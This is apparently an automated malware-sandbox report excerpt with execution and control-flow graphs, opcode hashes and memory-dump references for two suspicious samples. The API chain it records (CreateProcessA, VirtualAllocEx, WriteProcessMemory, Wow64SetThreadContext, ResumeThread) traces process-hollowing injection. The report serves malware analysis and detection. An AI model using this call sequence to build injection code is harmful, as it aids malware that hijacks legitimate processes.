                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: LR^q$LR^q$$^q$$^q
                                                                                      • API String ID: 0-2454687669
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000D.00000002.4168198526.0000000006480000.00000040.00000800.00020000.00000000.sdmp, Offset: 06480000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_13_2_6480000_sFPEKzHsLkYZIz.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: $^q$$^q$$^q$$^q
                                                                                      • API String ID: 0-2125118731
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Execution Graph

                                                                                      Execution Coverage:8.3%
                                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                                      Signature Coverage:0%
                                                                                      Total number of Nodes:127
                                                                                      Total number of Limit Nodes:4
                                                                                      execution_graph 27046 6ee1a1c 27050 6ee34a8 27046->27050 27066 6ee34e0 27046->27066 27047 6ee1a30 27051 6ee34fa 27050->27051 27063 6ee351e 27051->27063 27082 6ee38ef 27051->27082 27087 6ee3cf1 27051->27087 27095 6ee3ad0 27051->27095 27100 6ee40f5 27051->27100 27105 6ee3e55 27051->27105 27109 6ee3d16 27051->27109 27116 6ee3d7b 27051->27116 27120 6ee429f 27051->27120 27124 6ee3c00 27051->27124 27128 6ee3fa0 27051->27128 27132 6ee3b23 27051->27132 27137 6ee3a64 27051->27137 27142 6ee3cad 27051->27142 27063->27047 27067 6ee34fa 27066->27067 27068 6ee38ef 2 API calls 27067->27068 27069 6ee3cad 2 API calls 27067->27069 27070 6ee351e 27067->27070 27071 6ee3a64 2 API calls 27067->27071 27072 6ee3b23 2 API calls 27067->27072 27073 6ee3fa0 2 API calls 27067->27073 27074 6ee3c00 2 API calls 27067->27074 27075 6ee429f 2 API calls 27067->27075 27076 6ee3d7b 2 API calls 27067->27076 27077 6ee3d16 4 API calls 27067->27077 27078 6ee3e55 2 API calls 27067->27078 27079 6ee40f5 2 API calls 27067->27079 27080 6ee3ad0 2 API calls 27067->27080 27081 6ee3cf1 2 API calls 27067->27081 27068->27070 27069->27070 27070->27047 27071->27070 27072->27070 27073->27070 27074->27070 27075->27070 27076->27070 27077->27070 27078->27070 27079->27070 27080->27070 27081->27070 27083 6ee38f5 27082->27083 27147 6ee13c5 27083->27147 27151 6ee13d0 27083->27151 27088 6ee3cae 27087->27088 27089 6ee39e0 27087->27089 27092 6ee1231 ReadProcessMemory 27088->27092 27155 6ee1238 27088->27155 27090 6ee3e44 27089->27090 27093 6ee1238 ReadProcessMemory 27089->27093 27159 6ee1231 27089->27159 27090->27063 27092->27089 27093->27089 27096 6ee3ae2 27095->27096 27097 6ee3985 27096->27097 27163 6ee1088 27096->27163 27167 6ee1080 27096->27167 27097->27063 27101 6ee4186 27100->27101 27171 6ee0fb0 27101->27171 27175 6ee0fa8 27101->27175 27102 6ee41a1 27106 6ee3d9b 27105->27106 27106->27105 27179 6ee0ef9 27106->27179 27183 6ee0f00 27106->27183 
27112 6ee0fa8 Wow64SetThreadContext 27109->27112 27113 6ee0fb0 Wow64SetThreadContext 27109->27113 27110 6ee4107 27110->27063 27111 6ee3d30 27111->27110 27114 6ee0ef9 ResumeThread 27111->27114 27115 6ee0f00 ResumeThread 27111->27115 27112->27111 27113->27111 27114->27111 27115->27111 27117 6ee3d9a 27116->27117 27118 6ee0ef9 ResumeThread 27117->27118 27119 6ee0f00 ResumeThread 27117->27119 27118->27117 27119->27117 27187 6ee1148 27120->27187 27191 6ee1140 27120->27191 27121 6ee3f75 27121->27120 27125 6ee3c0d 27124->27125 27126 6ee0ef9 ResumeThread 27125->27126 27127 6ee0f00 ResumeThread 27125->27127 27126->27125 27127->27125 27130 6ee1148 WriteProcessMemory 27128->27130 27131 6ee1140 WriteProcessMemory 27128->27131 27129 6ee3fce 27129->27063 27130->27129 27131->27129 27133 6ee3a90 27132->27133 27134 6ee3ab1 27133->27134 27135 6ee1148 WriteProcessMemory 27133->27135 27136 6ee1140 WriteProcessMemory 27133->27136 27134->27063 27135->27134 27136->27134 27138 6ee3a6a 27137->27138 27140 6ee1148 WriteProcessMemory 27138->27140 27141 6ee1140 WriteProcessMemory 27138->27141 27139 6ee3ab1 27139->27063 27140->27139 27141->27139 27143 6ee39e0 27142->27143 27145 6ee1238 ReadProcessMemory 27142->27145 27146 6ee1231 ReadProcessMemory 27142->27146 27143->27142 27144 6ee3e44 27143->27144 27144->27063 27145->27143 27146->27143 27148 6ee1459 CreateProcessA 27147->27148 27150 6ee161b 27148->27150 27150->27150 27152 6ee1459 CreateProcessA 27151->27152 27154 6ee161b 27152->27154 27156 6ee1283 ReadProcessMemory 27155->27156 27158 6ee12c7 27156->27158 27158->27089 27160 6ee1236 ReadProcessMemory 27159->27160 27162 6ee12c7 27160->27162 27162->27089 27164 6ee10c8 VirtualAllocEx 27163->27164 27166 6ee1105 27164->27166 27166->27096 27168 6ee1088 VirtualAllocEx 27167->27168 27170 6ee1105 27168->27170 27170->27096 27172 6ee0ff5 Wow64SetThreadContext 27171->27172 27174 6ee103d 27172->27174 27174->27102 27176 6ee0fb0 Wow64SetThreadContext 27175->27176 27178 6ee103d 27176->27178 27178->27102 27180 
6ee0f00 ResumeThread 27179->27180 27182 6ee0f71 27180->27182 27182->27106 27184 6ee0f40 ResumeThread 27183->27184 27186 6ee0f71 27184->27186 27186->27106 27188 6ee1190 WriteProcessMemory 27187->27188 27190 6ee11e7 27188->27190 27190->27121 27192 6ee1148 WriteProcessMemory 27191->27192 27194 6ee11e7 27192->27194 27194->27121 27021 227d9f8 27024 227daf0 27021->27024 27022 227da07 27025 227db01 27024->27025 27028 227db24 27024->27028 27033 227ce40 27025->27033 27028->27022 27029 227db1c 27029->27028 27030 227dd28 GetModuleHandleW 27029->27030 27031 227dd55 27030->27031 27031->27022 27034 227dce0 GetModuleHandleW 27033->27034 27036 227db0c 27034->27036 27036->27028 27037 227dd88 27036->27037 27038 227ce40 GetModuleHandleW 27037->27038 27039 227dd9c 27038->27039 27040 227ddc1 27039->27040 27042 227cea8 27039->27042 27040->27029 27043 227df48 LoadLibraryExW 27042->27043 27045 227dfc1 27043->27045 27045->27040

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000E.00000002.1857264877.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_14_2_6a50000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: tIh
                                                                                      • API String ID: 0-443931868
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000E.00000002.1857264877.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_14_2_6a50000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: tIh
                                                                                      • API String ID: 0-443931868
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000E.00000002.1857264877.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_14_2_6a50000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000E.00000002.1857264877.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_14_2_6a50000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: da1a7854a3f2e336a3adf8953a051c056e88ef1eecc9848e768fe5664261dacc
                                                                                      • Instruction ID: e9274bc7d175d0ee388bd232bbe04981fcf62cb9f3f02fe130cb92cd7e696c80
                                                                                      • Opcode Fuzzy Hash: da1a7854a3f2e336a3adf8953a051c056e88ef1eecc9848e768fe5664261dacc
                                                                                      • Instruction Fuzzy Hash: C0912670D15209EFDB48DFA5E68099DFBF2FB89300F20A42AE816B7264D7349945CF54
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000E.00000002.1857264877.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_14_2_6a50000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: d3148af90cec65e59a7922dbde40a0305efbd0d88212bafb5c43cf40ab5302f4
                                                                                      • Instruction ID: a8e24efed16d075a8e72f785be8ee04e00f0f76653a89e525dc42c895fb3f9cc
                                                                                      • Opcode Fuzzy Hash: d3148af90cec65e59a7922dbde40a0305efbd0d88212bafb5c43cf40ab5302f4
                                                                                      • Instruction Fuzzy Hash: 76811174E04219CFDB44DFAAD9809EEFBB1FB98300F20951AD911B7254D7389962CF94
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000E.00000002.1857264877.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_14_2_6a50000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 4f99818966c78d5ca44ad98db53789d160cb33c51f1af4c17066840dac1326d6
                                                                                      • Instruction ID: 676b253125ded6076fb34cb3be970589036c3f943a3e8339b2e7bb27463fd1f9
                                                                                      • Opcode Fuzzy Hash: 4f99818966c78d5ca44ad98db53789d160cb33c51f1af4c17066840dac1326d6
                                                                                      • Instruction Fuzzy Hash: E6810175E04219CFDB44DFAAD9809EEBBB1FB98300F20991AD811B7254D7389962CF94
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000E.00000002.1857264877.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_14_2_6a50000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 12b457b07bd071618bc992658ddb065cb4b947d4561d476fdd649b144954f567
                                                                                      • Instruction ID: 713b8ff918991d934a96ca8d3266e1bbfd4d8933d829c8b8fd3b5d8f31a2b4a7
                                                                                      • Opcode Fuzzy Hash: 12b457b07bd071618bc992658ddb065cb4b947d4561d476fdd649b144954f567
                                                                                      • Instruction Fuzzy Hash: FB316F71D057848FD719CF6A8C502DABFF3AFCA300F19C1A6D408AB265DA780946CB51
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000E.00000002.1857264877.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_14_2_6a50000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: dcbb70883cc11238a6b6ac61079bcd60c12dd280f55fcba4c371bd89a2296071
                                                                                      • Instruction ID: d409095308f94a22dc0f454c7d67f71a557ef54657368d17c54cb3f4ee9e9d57
                                                                                      • Opcode Fuzzy Hash: dcbb70883cc11238a6b6ac61079bcd60c12dd280f55fcba4c371bd89a2296071
                                                                                      • Instruction Fuzzy Hash: F721ED71E006188BDB58CFABD9442DEFBF3AFC8310F14C17AD908A6258DB741A45CB50
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000E.00000002.1857503131.0000000006EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EE0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_14_2_6ee0000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 17fd22b4b1fdb01d66a0a571d44831c95e6706a51c8e94f04953fcda97a8d2c6
                                                                                      • Instruction ID: 9b47765291c6f095fe4d02200f42c66d99dea4fa9ef88b235ce08fabb5aebd6a
                                                                                      • Opcode Fuzzy Hash: 17fd22b4b1fdb01d66a0a571d44831c95e6706a51c8e94f04953fcda97a8d2c6
                                                                                      • Instruction Fuzzy Hash: 47C09226F8F308DAABC02C8578144FCF3BCD68F462F803062D21EA3992412082A685C8
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 143 6a51530-6a5154e 144 6a51555-6a5155a 143->144 145 6a51550 143->145 157 6a5155d call 6a51628 144->157 158 6a5155d call 6a5161a 144->158 145->144 146 6a51563 147 6a5156a-6a51586 146->147 148 6a5158f-6a51590 147->148 149 6a51588 147->149 150 6a51592-6a515a6 148->150 151 6a515fd-6a51601 148->151 149->146 149->150 149->151 152 6a515d6-6a515f8 149->152 154 6a515b9-6a515c0 150->154 155 6a515a8-6a515b7 150->155 152->147 156 6a515c7-6a515d4 154->156 155->156 156->147 157->146 158->146
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000E.00000002.1857264877.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_14_2_6a50000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 3H5$3H5
                                                                                      • API String ID: 0-2752242361
                                                                                      • Opcode ID: c70508e03bd1a02970807bb0eb4866fb8d88939b9f05e44df587b8bb67480f35
                                                                                      • Instruction ID: fd12d8930ebf51f82c5586e2b92796c9f329cbe8734340d8d7cbf508465ff83a
                                                                                      • Opcode Fuzzy Hash: c70508e03bd1a02970807bb0eb4866fb8d88939b9f05e44df587b8bb67480f35
                                                                                      • Instruction Fuzzy Hash: 5421FAB0D15209DFDB44DFA9D540AAEFBF1FF89300F24D56AD509A7214E7309A45CB81
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 159 6ee13c5-6ee1465 161 6ee149e-6ee14be 159->161 162 6ee1467-6ee1471 159->162 167 6ee14f7-6ee1526 161->167 168 6ee14c0-6ee14ca 161->168 162->161 163 6ee1473-6ee1475 162->163 165 6ee1498-6ee149b 163->165 166 6ee1477-6ee1481 163->166 165->161 169 6ee1485-6ee1494 166->169 170 6ee1483 166->170 178 6ee155f-6ee1619 CreateProcessA 167->178 179 6ee1528-6ee1532 167->179 168->167 171 6ee14cc-6ee14ce 168->171 169->169 172 6ee1496 169->172 170->169 173 6ee14d0-6ee14da 171->173 174 6ee14f1-6ee14f4 171->174 172->165 176 6ee14de-6ee14ed 173->176 177 6ee14dc 173->177 174->167 176->176 180 6ee14ef 176->180 177->176 190 6ee161b-6ee1621 178->190 191 6ee1622-6ee16a8 178->191 179->178 181 6ee1534-6ee1536 179->181 180->174 183 6ee1538-6ee1542 181->183 184 6ee1559-6ee155c 181->184 185 6ee1546-6ee1555 183->185 186 6ee1544 183->186 184->178 185->185 187 6ee1557 185->187 186->185 187->184 190->191 201 6ee16aa-6ee16ae 191->201 202 6ee16b8-6ee16bc 191->202 201->202 203 6ee16b0 201->203 204 6ee16be-6ee16c2 202->204 205 6ee16cc-6ee16d0 202->205 203->202 204->205 208 6ee16c4 204->208 206 6ee16d2-6ee16d6 205->206 207 6ee16e0-6ee16e4 205->207 206->207 209 6ee16d8 206->209 210 6ee16f6-6ee16fd 207->210 211 6ee16e6-6ee16ec 207->211 208->205 209->207 212 6ee16ff-6ee170e 210->212 213 6ee1714 210->213 211->210 212->213 215 6ee1715 213->215 215->215
                                                                                      APIs
                                                                                      • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06EE1606
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000E.00000002.1857503131.0000000006EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EE0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_14_2_6ee0000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID: CreateProcess
                                                                                      • String ID:
                                                                                      • API String ID: 963392458-0
                                                                                      • Opcode ID: 1e0e8addcad4b65f86d084739629348dc8fa50d5709132e082191a9f69ea165f
                                                                                      • Instruction ID: a04f5d0b46ba1a778fb916bafd9f56e88661baec378f4ec0f06cc9d91261bdef
                                                                                      • Opcode Fuzzy Hash: 1e0e8addcad4b65f86d084739629348dc8fa50d5709132e082191a9f69ea165f
                                                                                      • Instruction Fuzzy Hash: BEA14B71D1031ADFDB50DFA8C840BEDBBB2AF48314F1485AAE809A7290D7749985CF91
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 216 6ee13d0-6ee1465 218 6ee149e-6ee14be 216->218 219 6ee1467-6ee1471 216->219 224 6ee14f7-6ee1526 218->224 225 6ee14c0-6ee14ca 218->225 219->218 220 6ee1473-6ee1475 219->220 222 6ee1498-6ee149b 220->222 223 6ee1477-6ee1481 220->223 222->218 226 6ee1485-6ee1494 223->226 227 6ee1483 223->227 235 6ee155f-6ee1619 CreateProcessA 224->235 236 6ee1528-6ee1532 224->236 225->224 228 6ee14cc-6ee14ce 225->228 226->226 229 6ee1496 226->229 227->226 230 6ee14d0-6ee14da 228->230 231 6ee14f1-6ee14f4 228->231 229->222 233 6ee14de-6ee14ed 230->233 234 6ee14dc 230->234 231->224 233->233 237 6ee14ef 233->237 234->233 247 6ee161b-6ee1621 235->247 248 6ee1622-6ee16a8 235->248 236->235 238 6ee1534-6ee1536 236->238 237->231 240 6ee1538-6ee1542 238->240 241 6ee1559-6ee155c 238->241 242 6ee1546-6ee1555 240->242 243 6ee1544 240->243 241->235 242->242 244 6ee1557 242->244 243->242 244->241 247->248 258 6ee16aa-6ee16ae 248->258 259 6ee16b8-6ee16bc 248->259 258->259 260 6ee16b0 258->260 261 6ee16be-6ee16c2 259->261 262 6ee16cc-6ee16d0 259->262 260->259 261->262 265 6ee16c4 261->265 263 6ee16d2-6ee16d6 262->263 264 6ee16e0-6ee16e4 262->264 263->264 266 6ee16d8 263->266 267 6ee16f6-6ee16fd 264->267 268 6ee16e6-6ee16ec 264->268 265->262 266->264 269 6ee16ff-6ee170e 267->269 270 6ee1714 267->270 268->267 269->270 272 6ee1715 270->272 272->272
                                                                                      APIs
                                                                                      • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06EE1606
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000E.00000002.1857503131.0000000006EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EE0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_14_2_6ee0000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID: CreateProcess
                                                                                      • String ID:
                                                                                      • API String ID: 963392458-0
                                                                                      • Opcode ID: 8ce42aaa92fbe186dc83ead7073571299ad606b117586ae9e3bced40ef582d14
                                                                                      • Instruction ID: 6be82567384bbde99b08822b1187c057b64d9bbed0c59fc8ce4474c17e52c55e
                                                                                      • Opcode Fuzzy Hash: 8ce42aaa92fbe186dc83ead7073571299ad606b117586ae9e3bced40ef582d14
                                                                                      • Instruction Fuzzy Hash: 7D914C71D10319DFDB50CFA8C841BEDBBB2BF48314F1485AAE809A7290DB749985CF91
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 273 227daf0-227daff 274 227db01-227db0e call 227ce40 273->274 275 227db2b-227db2f 273->275 280 227db24 274->280 281 227db10-227db1e call 227dd88 274->281 276 227db43-227db84 275->276 277 227db31-227db3b 275->277 284 227db86-227db8e 276->284 285 227db91-227db9f 276->285 277->276 280->275 281->280 289 227dc60-227dd20 281->289 284->285 287 227dbc3-227dbc5 285->287 288 227dba1-227dba6 285->288 290 227dbc8-227dbcf 287->290 291 227dbb1 288->291 292 227dba8-227dbaf call 227ce4c 288->292 323 227dd22-227dd25 289->323 324 227dd28-227dd53 GetModuleHandleW 289->324 295 227dbd1-227dbd9 290->295 296 227dbdc-227dbe3 290->296 294 227dbb3-227dbc1 291->294 292->294 294->290 295->296 298 227dbe5-227dbed 296->298 299 227dbf0-227dbf2 call 227ce5c 296->299 298->299 302 227dbf7-227dbf9 299->302 304 227dc06-227dc0b 302->304 305 227dbfb-227dc03 302->305 306 227dc0d-227dc14 304->306 307 227dc29-227dc36 304->307 305->304 306->307 309 227dc16-227dc26 call 227ce6c call 227ce7c 306->309 314 227dc59-227dc5f 307->314 315 227dc38-227dc56 307->315 309->307 315->314 323->324 325 227dd55-227dd5b 324->325 326 227dd5c-227dd70 324->326 325->326
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000E.00000002.1849013837.0000000002270000.00000040.00000800.00020000.00000000.sdmp, Offset: 02270000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_14_2_2270000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID: HandleModule
                                                                                      • String ID:
                                                                                      • API String ID: 4139908857-0
                                                                                      • Opcode ID: ea2307780e2e6db94d21940bdfa1f8f4a524ade5132e4778f069291a304ec45a
                                                                                      • Instruction ID: 8f527ba31bfd914e7d9665ff39420c3d32d70fa0ef7ff55c6c87e45d082f30fd
                                                                                      • Opcode Fuzzy Hash: ea2307780e2e6db94d21940bdfa1f8f4a524ade5132e4778f069291a304ec45a
                                                                                      • Instruction Fuzzy Hash: 16713470A14B068FD724DF6AD44079ABBF2FF88304F00892DD48AD7A54DB75E946CB90
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 407 6ee1231-6ee12c5 ReadProcessMemory 412 6ee12ce-6ee12fe 407->412 413 6ee12c7-6ee12cd 407->413 413->412
                                                                                      APIs
                                                                                      • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06EE12B8
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000E.00000002.1857503131.0000000006EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EE0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_14_2_6ee0000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID: MemoryProcessRead
                                                                                      • String ID:
                                                                                      • API String ID: 1726664587-0
                                                                                      • Opcode ID: 72d1ceb4b1914a62e99a4a05850b1085eadeb9eef2baadb3082da83a58b83089
                                                                                      • Instruction ID: 56c9edd9689a4f5d4f12a595bdb68fb01e94f6f76492e0f5bf3a16fc332f2acf
                                                                                      • Opcode Fuzzy Hash: 72d1ceb4b1914a62e99a4a05850b1085eadeb9eef2baadb3082da83a58b83089
                                                                                      • Instruction Fuzzy Hash: BD3196B1C003489FCB10DFAAD845AEFBBF4BF49314F10842AE958A7241C7389544DBA0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 417 6ee1140-6ee1196 420 6ee1198-6ee11a4 417->420 421 6ee11a6-6ee11e5 WriteProcessMemory 417->421 420->421 423 6ee11ee-6ee121e 421->423 424 6ee11e7-6ee11ed 421->424 424->423
                                                                                      APIs
                                                                                      • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06EE11D8
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000E.00000002.1857503131.0000000006EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EE0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_14_2_6ee0000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID: MemoryProcessWrite
                                                                                      • String ID:
                                                                                      • API String ID: 3559483778-0
                                                                                      • Opcode ID: c8347f2791d607a76f3f6d7470479bf053722569b2adf12fb6aef96622d8ad1f
                                                                                      • Instruction ID: e90e7abd84b09083863c934dc77076cb911728cc8a7a5d4ea04eb79e3898ba33
                                                                                      • Opcode Fuzzy Hash: c8347f2791d607a76f3f6d7470479bf053722569b2adf12fb6aef96622d8ad1f
                                                                                      • Instruction Fuzzy Hash: 1D2146B19003599FCB10DFA9C885BEEBBF5FF48314F10842AE959A7250C7789944CFA4
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 428 6ee0fa8-6ee0ffb 431 6ee0ffd-6ee1009 428->431 432 6ee100b-6ee103b Wow64SetThreadContext 428->432 431->432 434 6ee103d-6ee1043 432->434 435 6ee1044-6ee1074 432->435 434->435
                                                                                      APIs
                                                                                      • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06EE102E
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000E.00000002.1857503131.0000000006EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EE0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_14_2_6ee0000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID: ContextThreadWow64
                                                                                      • String ID:
                                                                                      • API String ID: 983334009-0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 439 6ee1148-6ee1196 441 6ee1198-6ee11a4 439->441 442 6ee11a6-6ee11e5 WriteProcessMemory 439->442 441->442 444 6ee11ee-6ee121e 442->444 445 6ee11e7-6ee11ed 442->445 445->444
                                                                                      APIs
                                                                                      • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06EE11D8
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000E.00000002.1857503131.0000000006EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EE0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_14_2_6ee0000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID: MemoryProcessWrite
                                                                                      • String ID:
                                                                                      • API String ID: 3559483778-0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 449 6ee0fb0-6ee0ffb 451 6ee0ffd-6ee1009 449->451 452 6ee100b-6ee103b Wow64SetThreadContext 449->452 451->452 454 6ee103d-6ee1043 452->454 455 6ee1044-6ee1074 452->455 454->455
                                                                                      APIs
                                                                                      • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06EE102E
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000E.00000002.1857503131.0000000006EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EE0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_14_2_6ee0000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID: ContextThreadWow64
                                                                                      • String ID:
                                                                                      • API String ID: 983334009-0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 459 6ee1238-6ee12c5 ReadProcessMemory 462 6ee12ce-6ee12fe 459->462 463 6ee12c7-6ee12cd 459->463 463->462
                                                                                      APIs
                                                                                      • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06EE12B8
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000E.00000002.1857503131.0000000006EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EE0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_14_2_6ee0000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID: MemoryProcessRead
                                                                                      • String ID:
                                                                                      • API String ID: 1726664587-0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
